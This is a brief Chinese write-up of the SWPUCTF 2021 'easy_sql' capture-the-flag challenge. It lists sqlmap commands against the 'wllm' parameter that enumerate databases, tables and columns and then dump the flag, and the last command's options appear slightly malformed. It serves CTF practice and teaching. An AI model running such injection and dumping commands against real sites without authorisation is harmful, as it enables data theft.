[SWPUCTF 2021 新生赛]easy_sql
这道题呢就是很简单的sql注入,我们直接用sqlmap来跑。
首先我们打开页面可以看见提示,参数为wllm
**然后我们启动虚拟机,输入sqlmap的命令:sqlmap -u "url地址/?wllm=1" --dbs **
这段命令是为了爆破数据库名
继续爆表名:sqlmap -u "url地址/?wllm=1" -D test_db --tables
爆列名:sqlmap -u "url地址/?wllm=1" -D test_db -T test_tb --columns
最后就爆出flag啦:sqlmap -u "url地址/?wllm=1" -D test_db -flag --dump
要注意kali要开root权限!!!